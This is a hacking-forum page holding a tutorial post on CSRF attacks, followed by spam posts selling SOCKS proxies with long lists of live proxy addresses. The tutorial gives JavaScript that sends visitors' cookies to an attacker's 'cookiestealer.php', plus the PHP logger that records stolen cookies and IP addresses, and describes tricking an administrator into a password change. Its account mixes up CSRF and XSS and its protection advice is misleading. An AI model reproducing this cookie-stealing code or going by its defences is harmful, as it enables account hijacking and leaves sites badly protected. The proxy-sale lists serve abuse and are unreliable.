Jump to content
GreekHacking-root@greekhacking.gr

Το forum βρίσκετε ακόμα σε διαδικασία αναβάθμισης.

Ευχαριστούμε

Recommended Posts

NiKR

In this tutorial I'll be discussing how a CSRF or XSRF attack works.
The method is called CSRF as well as XSRF. CSRF stands for Cross-Site Request Forgery. If you say XSRF the X obviously stands for the cross, just like XSS (Cross-Site Scripting).

I will be calling the method CSRF for the rest of the tutorial, because I prefer that term.

Table of Contents:

1) What is Cross-Site Request Forgery?
2) How do I find CSRF vulnerabilities?
3) How to take advantage of the IMG tag?
4) Keep it Simple
5) Securing yourself against CSRF
6) Conclusion

 

1) What is Cross-Site Request Forgery?

When performing a CSRF attack you can inject code in a webpage, like on forums or other websites where you can post comments on whatever what. The idea is to execute a HTTP request once a user visits the affected webpage, because this attack takes place on the side of the victim (Client-Sided), the request will be executed from the machine of the victim that vists the webpage. If, for example, a user is logged in to YouTube, a link can be crafted that can be hidden on a forum, which logs you out of YouTube.

We can go way further with this by, for example, making a request to a webpage, that, upon visiting, makes a few other request by using JavaScript. This could be used to steal information from websites the user is logged in to.

2) How do I find CSRF vulnerabilities?

CSRF vulnerabilities are often found in webpages with low security that allow everyone to make posts and comments. (Guests can comment) The fun part in that, is that you can create a post that can be seen by everyone visiting that page.

Though, it has to be possible to use HTML or BBCode.

The IMG Tag

A IMG tag in HTML (<img>) is often used as the following :

<img src="http://website.com/myimage.jpg">

As you may know PHP pages are also able to return images. This gives the possibility to do this, for example.

<img src="http://website.com/my_php_page.php">

If the PHP page my_php_page returns an image, the image will be displayed by the HTML tag .

 

3) How to take advantage of the IMG tag?

Yea, so how do we actually do it? Well, as I said PHP pages can also return images. Let's get to this simple scenario:

You've just found a webpage with the possibility to place comments, and you're able to use HTML within the comments. The website does not check the refer, and it's possible to use PHP extensions within the IMG tag. You write some PHP code that returns an image, but at the same time executes some Javascript too, that sends the victim to another page. If someone visits the page where you used the IMG tag, a picture will be shown, but at the same time the Javascript code is running as well. This way you can steal cookies, for example, or even write and post comments under somebody elses name.
Pretend we have the following code:

<html><head><script type="text/javascript">
    var http = GetXmlHttpObject();
    if(http != null)
    {
      var url = "http://mywebsite.com/cookiestealer.php?cookie=" + document.cookie; 
      http.open("GET", url, false);
      http.send(null);
    }

    function GetXmlHttpObject()
    {

Note: In this case I did not write PHP code to display an image. This is simple HTML/JS code that executes a HTML request to a certain page.

If you're a little familiar with JS you can see there was make a HTTP GET request to the page mywebsite.com/cookiestealer.php. After that, a GET arguement will be given that has the value 'document.cookie'. Document.cookie will always contain the cookie of the page where the Javascript code is being executed. In this case it will steal the cookie of the user that visits the page.
On the website I've found I've uploaded the following code:

<?php
    $cookie = $_GET['cookie'];
    $ip = $_SERVER['REMOTE_ADDR'];

    $fh = fopen("log.txt", 'a') or die("can't open file");
    fwrite($fh, $cookie . "\n" . $ip . "\n\n");

    fclose($fh);
?>

This PHP code will get the value of the GET arguement and the IP address of the person visiting your page. After that the code would add this information into the file called 'log.txt'.

Every time someone visits the page where I posted the link with the IMG tag with a link to a page that executes the JS code, the code will request the cookiestealer and place the cookie in the GET arguement.
At last, you can see the cookies flow into your log.

4) Keep it Simple.

In the above code I showed a kind of extensive example. Really bad secured websites with bad software have even bigger bugs than that.

Like that you can for example first install the forum software on your local software, and look what HTTP GET request you have to make to change the password of the administrator. Pretend it's like the following:

You'd have to send that URL to the Administrator in a Private Message, in a IMG tag. If the administrator reads the message, a request will be made to the above URL and will change the Admin password to mynewpass123.
I have to say, it's often alot harder than the above example.

5) Protecting yourself against CSRF
You can protect yourself against CSRF attacks by, for example, stop loading images.

6) Conclusion
So what is a CSRF attack..? A CSRF attack is an attack that can be performed with less effort, if you know what you're doing, and can do alot of damage. Protecting against CSRF attacks is harder, but good to accomplish if you're working on, for example, a CMS.

  • Μου αρέσει 1

Share this post


Link to post
Share on other sites

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε προκειμένου να το δείτε

Πρέπει να είστε μέλος για να μπορέσετε να αφήσετε κάποιο σχόλιο

Δημιουργία λογαριασμού

Κάντε μια δωρεάν εγγραφή στην κοινότητά μας. Η εγγραφές μας είναι εύκολες.!

Εγγραφή τώρα

Σύνδεση

Εάν έχετε ήδη λογαριασμό σε αυτό το Forum; Συνδεθείτε εδώ.

Συνδεθείτε τώρα

  • Μηνύματα

    • dichvusocks
      Payment Instantly perfectmoney, bitcoin, wmtransfer, wex, ETH (Please click Buy Socks)
      Update Tools Client Dichvusocks.us http://dichvusocks.us/tools.php Link check socks http://check.dichvusocks.us/
      LIVE | 95.110.224.30:8896 | 0.59 | Toscana | 52100 | host30-224-110-95.serverdedicati.aruba.it | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:25247 | 0.09 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.158.232:8975 | 0.62 | Toscana | 52100 | host209-158-110-95.serverdedicati.aruba.it | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.224.30:32736 | 0.61 | Toscana | 52100 | host30-224-110-95.serverdedicati.aruba.it | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:19028 | 0.31 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.138.2:63643 | 0.09 | Arizona | 85250 | ip-192-169-140-162.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.138.2:63945 | 0.12 | Arizona | 85250 | ip-192-169-140-162.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 104.151.241.213:42354 | 0.26 | Florida | 33131 | 213.241-151-104.rdns.scalabledns.com | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 66.33.207.79:61845 | 0.18 | California | 92821 | ds8058.dreamservers.com | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:41190 | 0.09 | Arizona | 85250 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:33964 | 0.09 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.100:41248 | 0.63 | Arizona | 85250 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:22649 | 0.09 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.100:20624 | 0.14 | Arizona | 85250 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.100:44290 | 1 | Arizona | 85250 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 178.32.222.125:9050 | 1.86 | Unknow | Unknow | chulak.enn.lu | Anonymous Proxy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:2398 | 0.11 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:56755 | 0.09 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
       
    • vn5socks.net
      LIVE ~ 66.181.166.140:6667 | 0.084 | Atlanta | GA | 30318 | United States | Checked at vn5socks.net
      LIVE ~ 108.60.101.2:52660 | 0.204 | Unknown | Unknown | Unknown | United States | Checked at vn5socks.net
      LIVE ~ 193.178.187.136:37350 | 0.225 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 195.191.127.69:55580 | 0.233 | Kiev | 12 | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 176.104.1.244:39445 | 0.219 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 78.26.207.173:30013 | 0.282 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 184.174.72.143:61177 | 0.29 | Las Vegas | NV | 89147 | United States | Checked at vn5socks.net
      LIVE ~ 194.182.64.113:41080 | 0.277 | Tranbjerg | 18 | Unknown | Denmark | Checked at vn5socks.net
      LIVE ~ 96.27.26.132:10200 | 0.257 | Troy | MI | 48083 | United States | Checked at vn5socks.net
      LIVE ~ 38.96.151.129:42984 | 0.301 | Brooklyn | NY | Unknown | United States | Checked at vn5socks.net
      LIVE ~ 38.103.238.33:54046 | 0.244 | Washington | DC | 20007 | United States | Checked at vn5socks.net
      LIVE ~ 38.103.238.41:54046 | 0.246 | Washington | DC | 20007 | United States | Checked at vn5socks.net
      LIVE ~ 108.60.101.57:53255 | 0.205 | Unknown | Unknown | Unknown | United States | Checked at vn5socks.net
      LIVE ~ 208.102.51.6:58208 | 0.309 | Cincinnati | OH | Unknown | United States | Checked at vn5socks.net
      LIVE ~ 76.227.128.22:7000 | 0.285 | Unknown | Unknown | Unknown | United States | Checked at vn5socks.net
      LIVE ~ 67.174.209.75:37605 | 0.22 | Concord | CA | 94521 | United States | Checked at vn5socks.net
      LIVE ~ 217.147.171.135:5055 | 0.252 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 149.36.44.197:8841 | 0.386 | Washington | DC | 20007 | United States | Checked at vn5socks.net
    • tisocks
      SOCKS Proxy List by Tisocks.net
      If you Need Socks5 , Please visit service and add fund via PM , BTC WMZ , WEX . Thanks all!!
      Add fund : https://tisocks.net/addfund
      Check socks5 Online here : https://checksocks5.com
      LIVE | 216.226.95.250:39936 | 0.12 | SOCKS5 | Wisconsin | 54667 | N/A | United States | Checked at https://tisocks.net
      LIVE | 23.28.87.121:62208 | 0.147 | SOCKS5 | Michigan | 48187 | d28-23-121-87.dim.wideopenwest.com | United States | Checked at https://tisocks.net
      LIVE | 173.214.155.218:61952 | 0.174 | SOCKS5 | Georgia | 31730 | N/A | United States | Checked at https://tisocks.net
      LIVE | 24.35.20.53:31720 | 0.196 | SOCKS5 | Michigan | 48895 | c-24-35-20-53.customer.broadstripe.net | United States | Checked at https://tisocks.net
      LIVE | 74.195.17.110:45568 | 0.168 | SOCKS5 | West Virginia | 24740 | 74-195-17-110.bklycmtk03.com.dyn.suddenlink.net | United States | Checked at https://tisocks.net
      LIVE | 206.255.91.1:26880 | 0.256 | SOCKS5 | Arkansas | 71913 | hsprings01cpe.1.91.255.206.ark.cablelynx.com | United States | Checked at https://tisocks.net
      LIVE | 192.169.136.80:5016 | 0.263 | SOCKS5 | Arizona | 85250 | ip-192-169-136-80.ip.secureserver.net | United States | Checked at https://tisocks.net
      LIVE | 72.47.93.80:54272 | 0.185 | SOCKS5 | Arkansas | 72401 | 72-47-93-80.jsbrcmtk02.com.dyn.suddenlink.net | United States | Checked at https://tisocks.net
      LIVE | 221.153.75.187:2542 | 0.768 | SOCKS5 | Kyonggi-do | Unknow | N/A | Korea, Republic of | Checked at https://tisocks.net
      LIVE | 74.196.90.172:13312 | 0.129 | SOCKS5 | Unknow | Unknow | | Unknow | Checked at https://tisocks.net
      LIVE | 24.35.139.51:7936 | 0.255 | SOCKS5 | Arkansas | 72113 | 24-35-139-51.fidnet.com | United States | Checked at https://tisocks.net
      LIVE | 90.231.72.5:9050 | 1.235 | SOCKS5 | Unknow | Unknow | leafar.parckwart.de | Anonymous Proxy | Checked at https://tisocks.net
      LIVE | 219.85.30.236:8081 | 0.801 | SOCKS5 | T\'ai-pei | Unknow | 219-85-30-236-adsl-TPE.dynamic.so-net.net.tw | Taiwan | Checked at https://tisocks.net
      LIVE | 175.205.192.26:1924 | 0.771 | SOCKS5 | Unknow | Unknow | | Unknow | Checked at https://tisocks.net
      LIVE | 202.131.231.106:11753 | 0.623 | SOCKS5 | Ulaanbaatar | Unknow | N/A | Mongolia | Checked at https://tisocks.net
       
    • shopsocks5.com
      [Shopsocks5.com] Service Socks5 Cheap
      Payment Instantly Perfectmoney, Bitcoin, Wmtransfer, BTC-E ( Please click Buy Socks )
      Check Socks Online  http://shopsocks5.com/check/




        Live | 66.33.207.79:53592 | United States | Brea | CA | 92821 | Checked at Shopsocks5.com Live | 178.32.142.155:30815 | Italy | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 77.244.26.77:8975 | Russia | Saint Petersburg | 66 | 190008 | Checked at Shopsocks5.com Live | 66.33.207.79:54122 | United States | Brea | CA | 92821 | Checked at Shopsocks5.com Live | 45.55.169.78:27100 | United States | New York | NY | 10118 | Checked at Shopsocks5.com Live | 208.102.51.6:58208 | United States | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 42.112.20.116:7200 | Vietnam | Hanoi | 44 | Unknown | Checked at Shopsocks5.com Live | 185.216.140.229:8975 | Unknown | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 104.151.241.213:42354 | United States | Miami | FL | 33131 | Checked at Shopsocks5.com Live | 67.197.144.165:54112 | United States | Fort Mill | SC | 29707 | Checked at Shopsocks5.com Live | 139.162.238.135:25893 | United Kingdom | London | H9 | EC4N | Checked at Shopsocks5.com Live | 50.63.167.72:64579 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com Live | 192.169.182.200:2398 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com Live | 97.74.230.16:38015 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com Live | 95.110.224.30:40002 | Italy | Arezzo | 16 | 52100 | Checked at Shopsocks5.com Live | 50.63.167.72:41190 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com
    • dichvusocks
      Payment Instantly perfectmoney, bitcoin, wmtransfer, wex, ETH (Please click Buy Socks)
      Update Tools Client Dichvusocks.us http://dichvusocks.us/tools.php Link check socks http://check.dichvusocks.us/
      LIVE | 192.169.140.162:58491 | 0.94 | Arizona | 85250 | ip-192-169-140-162.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 37.59.8.29:16083 | 0.54 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 66.33.207.79:54122 | 0.18 | California | 92821 | ds8058.dreamservers.com | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 185.108.76.37:9050 | 1.19 | Unknow | Unknow | N/A | Anonymous Proxy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 207.148.77.4:9050 | 1.12 | Unknow | Unknow | ori.enn.lu | Anonymous Proxy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 66.33.207.79:59847 | 1.16 | California | 92821 | ds8058.dreamservers.com | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.224.30:30989 | 1.51 | Toscana | 52100 | host30-224-110-95.serverdedicati.aruba.it | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.162:63945 | 1.14 | Arizona | 85250 | ip-192-169-140-162.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.138.2:58491 | 0.71 | Arizona | 85250 | ip-192-169-140-162.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:39593 | 0.09 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:15371 | 0.4 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 66.33.207.79:53592 | 0.59 | California | 92821 | ds8058.dreamservers.com | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 213.149.137.45:23736 | 0.7 | Kyustendil | 2600 | N/A | Bulgaria | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.138.2:54398 | 0.83 | Arizona | 85250 | ip-192-169-140-162.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 188.120.237.226:5348 | 0.68 | Unknow | Unknow | samara-avtoservis.ru | Russian Federation | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:44290 | 1.63 | Arizona | 85250 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.182.200:34353 | 0.09 | Arizona | 85260 | ip-192-169-182-200.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 187.188.158.218:19574 | 0.28 | Guanajuato | 36437 | fixed-187-188-158-218.totalplay.net | Mexico | Blacklist: Yes | Checked at http://dichvusocks.us
       
×